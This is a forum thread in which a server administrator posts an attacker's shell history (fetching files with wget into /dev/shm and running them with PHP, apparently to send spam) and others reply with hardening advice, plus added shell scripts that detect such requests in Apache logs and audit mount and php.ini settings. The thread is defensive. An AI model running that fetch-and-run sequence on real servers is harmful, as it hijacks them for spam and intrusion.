
tmp shm hack

Discussion in 'General Discussion' started by Michael-MS, Dec 11, 2004.

  1. Michael-MS

    Michael-MS Well-Known Member

    This is from .bash_history in /tmp. Any idea how to stop this???

    Code:
    
    cd /dev/shm
    ls
    mkdir st
    ls
    cd st
    wget promocoesnatal.com/enviar.txt
    wget promocoesnatal.com/cinema.htm
    wget promocoesnatal.com/lista04.txt
    ls
    php -q enviar.txt lista04.txt cinema.htm
    
    
    Thanks,
    Michael
     
  2. Etheral

    Etheral Well-Known Member

  3. EdRooney

    EdRooney BANNED

    He said they are going to /dev/shm, not /tmp.

    Search the apache logs, someone is running a vulnerable script.
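    The suggestion above is to find the request that dropped the files by reading the Apache logs. This is an added example, not from the thread or from cPanel: a small POSIX shell scanner that decodes the usual percent-escapes and pulls out request lines mentioning /dev/shm, /tmp or a download tool such as wget, then lists the client addresses behind them. The log lines are constructed for the demo and "example.invalid" is a placeholder host, not the domain quoted in the thread; the access_log path in the comment is the usual cPanel location and is an assumption for your box.

```shell
#!/bin/sh
# Added example (not from the thread): scan Apache access_log lines for the
# tell-tale signs of the activity seen in the poster's .bash_history, i.e.
# request strings carrying "/dev/shm", "wget", "curl" and the like.
# The log lines below are CONSTRUCTED for the demo; "example.invalid" is a
# placeholder host, not the domain quoted in the thread.

SAMPLE_LOG='10.0.0.5 - - [11/Dec/2004:03:14:07 +0000] "GET /index.php HTTP/1.1" 200 512 "-" "Mozilla/4.0"
10.0.0.9 - - [11/Dec/2004:03:15:22 +0000] "GET /forum/page.php?f=cd%20/dev/shm%3Bls HTTP/1.1" 200 87 "-" "Mozilla/4.0"
10.0.0.5 - - [11/Dec/2004:03:16:01 +0000] "GET /images/logo.gif HTTP/1.1" 200 2210 "-" "Mozilla/4.0"
10.0.0.9 - - [11/Dec/2004:03:16:40 +0000] "GET /forum/page.php?f=wget%20example.invalid/enviar.txt HTTP/1.1" 200 91 "-" "Mozilla/4.0"'

# Decode the percent-escapes commonly seen in request strings so that
# "cd%20/dev/shm" matches the same pattern as "cd /dev/shm".
url_decode_basic() {
  sed -e 's/%20/ /g' -e 's/+/ /g' -e 's/%3[Bb]/;/g' -e 's/%2[Ff]/\//g' -e 's/%7[Cc]/|/g'
}

# scan_access_log LOGTEXT: print every request line whose quoted request
# string mentions the RAM/tmp directories or a download tool.
scan_access_log() {
  printf '%s\n' "$1" | url_decode_basic \
    | grep -E -i '"[A-Z]+ [^"]*(/dev/shm|/tmp/|/var/tmp/|wget |curl |lynx |fetch )'
}

# count_suspicious LOGTEXT: number of matching lines (prints 0 when clean).
count_suspicious() {
  scan_access_log "$1" | grep -c . || true
}

# suspicious_sources LOGTEXT: client IPs behind the matches, most active
# first; this is what goes into a firewall deny list once you have confirmed
# the hits by hand.
suspicious_sources() {
  scan_access_log "$1" | awk '{ print $1 }' | sort | uniq -c | sort -rn
}

# Demo on the constructed lines. On a cPanel box you would instead run
#   scan_access_log "$(cat /usr/local/apache/logs/access_log)"
# (path assumed) or pipe the file through the same grep.
echo "suspicious requests: $(count_suspicious "$SAMPLE_LOG")"
suspicious_sources "$SAMPLE_LOG"
```

    The matching request tells you which script on which virtual host is being abused; that script, not the download tool, is what needs fixing, and the same requests from the same address usually show up across several domain logs on a shared server.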
     
  4. linux-image

    linux-image Well-Known Member

  5. SupermanInNY

    SupermanInNY Well-Known Member

    In my php.ini I've entered the following functions into the disabled list and stopped that exploit cold.
    The phpBB fix was also implemented, but just changing the php.ini with those values stopped the problem immediately.

    Code:
    
    disable_functions = readfile, system, passthru
    ; This directive allows you to disable certain
    ; functions for security reasons. It receives
    ; a comma separated list of function names.
    ; This directive is *NOT* affected by whether
    ; Safe Mode is turned on or off.


    I strongly suggest modifying your php.ini to have those entries.

    -Alon.
     
  6. kaelin

    kaelin Member

    enviar.txt

    I cannot believe this is the only post on this - this has happened multiple times and some new hole gets discovered after we have closed the "existing" one - maybe people just don't know it's happening to them? If you are blackholed and you are not a spammer maybe this is why - maybe if you aren't like me and don't get root mail and suddenly get blasted with thousands of rejects from the (words I will not post on what these people are) "jerks" who do this to send their spam through your server - alerting us to the fact that it has "happened" again.

    I searched for enviar.txt and this is the only thing returned - so if there are more threads - please point me their way :)


    My tech partner used the fix that is in this small post after this started again yesterday - and lo and behold it happened again this morning.

    If someone has TRULY successfully stopped this I would appreciate knowing - other than disallowing wget entirely on the server (which I use because I'm on dialup in the boonies and it kills my productive time having to upload and download) - I would love to know.

    I'm sure not a vindictive person, nor one who wishes harm to others, but I can honestly say - if anyone figures out a way to blow these people's computers out when they hack and steal from others - I'd love to see it - I'd sell tickets and popcorn.
     
  7. chirpy

    chirpy Well-Known Member

    There are plenty of threads, it's more a matter of searching for the right thing. You're most likely being compromised through a vulnerable PHP script. So, search these forums to learn how to:

    1. Make sure that you have all of your phpBB forums upgraded to v2.13

    2. Install mod_security and use a strong set of filters

    3. Mount /dev/shm noexec,nosuid

    4. Make sure that you have a firewall installed (iptables if you're on Linux)

    5. Clean your server if it has been compromised and check for rootkit exploits

    6. Make sure that you're running php v4.3.10 and if possible enable phpsuexec

    You can get all that information from the forums and/or you can hire someone to do them for you if you don't have the time.
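    Two of the steps in the list above (mounting /dev/shm noexec,nosuid, and the php.ini disable_functions entry from the earlier post) can be verified rather than taken on trust. The following is an added example, not the thread's own advice and not cPanel code: a POSIX shell audit with a mount-table parser and a php.ini parser, run first against constructed samples and then against the live /proc/mounts and php.ini if they are readable. The php.ini paths (/usr/local/lib/php.ini for cPanel, /etc/php.ini for a distro PHP) are assumptions; the remount and fstab lines in the comments are standard Linux.

```shell
#!/bin/sh
# Added example (not from the thread or from cPanel): check the noexec,nosuid
# mount of /dev/shm and the php.ini disable_functions list, and report what is
# missing. MOUNTS/INI texts below are CONSTRUCTED samples; the live check at
# the bottom reads /proc/mounts and the php.ini paths only if they exist.

GOOD_MOUNTS='/dev/sda1 / ext3 rw 0 0
tmpfs /dev/shm tmpfs rw,nosuid,nodev,noexec 0 0'
BAD_MOUNTS='/dev/sda1 / ext3 rw 0 0
tmpfs /dev/shm tmpfs rw 0 0'

# The same disable_functions line posted earlier in the thread, trailing
# comment included, so the parser is shown coping with that layout.
SAMPLE_INI='; constructed php.ini fragment
disable_functions = readfile, system, passthru ; This directive allows you to disable certain functions
safe_mode = Off'

# shm_hardened MOUNTS_TEXT: 0 if /dev/shm is mounted with both noexec and
# nosuid, 1 if it is mounted without them, 2 if it is not a mount at all.
shm_hardened() {
  opts=$(printf '%s\n' "$1" | awk '$2 == "/dev/shm" { print $4 }' | tail -n 1)
  [ -n "$opts" ] || return 2
  case ",$opts," in
    *,noexec,*) ;;
    *) return 1 ;;
  esac
  case ",$opts," in
    *,nosuid,*) return 0 ;;
    *) return 1 ;;
  esac
}

# php_disables INI_TEXT FUNC: 0 if FUNC is listed in disable_functions.
# Strips the trailing ";" comment and whitespace before comparing.
php_disables() {
  printf '%s\n' "$1" \
    | sed -n 's/^[[:space:]]*disable_functions[[:space:]]*=\(.*\)$/\1/p' \
    | sed 's/;.*$//' | tr ',' '\n' | tr -d ' \t' | grep -qx "$2"
}

# audit_live: run both checks against the running system when possible.
# Remediation (standard Linux):
#   mount -o remount,noexec,nosuid /dev/shm
#   /etc/fstab: tmpfs /dev/shm tmpfs defaults,nosuid,nodev,noexec 0 0
audit_live() {
  if [ -r /proc/mounts ]; then
    if shm_hardened "$(cat /proc/mounts)"; then
      echo "/dev/shm: noexec,nosuid present"
    elif [ $? -eq 1 ]; then
      echo "/dev/shm: mounted WITHOUT noexec,nosuid"
    else
      echo "/dev/shm: not a separate mount"
    fi
  fi
  # php.ini locations are assumptions (cPanel build, then distro PHP).
  for ini in /usr/local/lib/php.ini /etc/php.ini; do
    [ -r "$ini" ] || continue
    for fn in system passthru exec shell_exec popen; do
      if php_disables "$(cat "$ini")" "$fn"; then
        echo "$ini: $fn disabled"
      else
        echo "$ini: $fn still ENABLED"
      fi
    done
  done
}

audit_live
```

    Two caveats the thread's steps do not spell out. First, noexec on /dev/shm stops a downloaded binary from being run directly, but the history at the top of the thread shows `php -q enviar.txt`: the interpreter reads the file, so noexec does not block that; disable_functions and a fixed script do. Second, disable_functions applies only to PHP loaded with that php.ini (the command-line php may read a different one, and run under phpsuexec each user's settings can differ), so check every php.ini that the web server actually uses.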
     
  8. kaelin

    kaelin Member

    Thank you, Chirpy

    I searched for enviar.txt - since that is the common thread I've seen - but thank you - I'll look and see what I can find.
     